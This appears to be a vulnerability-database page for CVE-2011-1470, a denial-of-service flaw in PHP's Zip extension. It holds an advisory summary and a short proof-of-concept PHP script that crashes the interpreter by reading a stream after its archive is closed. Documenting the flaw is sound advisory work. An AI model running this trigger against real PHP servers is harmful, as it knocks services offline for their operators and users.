PHP 5.3.x 'Zip' Extension Denial of Service vulnerabilit
Reporter | Title | Published | Views | Family All 54 |
---|---|---|---|---|
NVD | CVE-2011-1470 | 20 Mar 201102:00 | – | nvd |
Prion | Code injection | 20 Mar 201102:00 | – | prion |
UbuntuCve | CVE-2011-1470 | 19 Mar 201100:00 | – | ubuntucve |
seebug.org | PHP "Zip"扩展"stream_get_contents()"函数拒绝服务漏洞 | 27 Mar 201100:00 | – | seebug |
CVE | CVE-2011-1470 | 20 Mar 201102:00 | – | cve |
Cvelist | CVE-2011-1470 | 20 Mar 201101:00 | – | cvelist |
Tenable Nessus | SuSE 10 Security Update : PHP5 (ZYPP Patch Number 7553) | 13 Dec 201100:00 | – | nessus |
Tenable Nessus | SuSE 10 Security Update : PHP5 (ZYPP Patch Number 7554) | 17 Jun 201100:00 | – | nessus |
Tenable Nessus | SuSE 11.1 Security Update : PHP5 (SAT Patch Number 4663) | 17 Jun 201100:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2011:0645-1) | 13 Jun 201400:00 | – | nessus |
source: https://www.securityfocus.com/bid/46969/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$target_file = 'META-INF/MANIFEST.MF';
$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
return FALSE;
}
if ($za->statName($target_file) !== FALSE)
{
$fd = $za->getStream($target_file);
}
else
{
$fd = FALSE;
}
$za->close();
if (is_resource($fd))
{
echo strlen(stream_get_contents($fd));
}
?>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo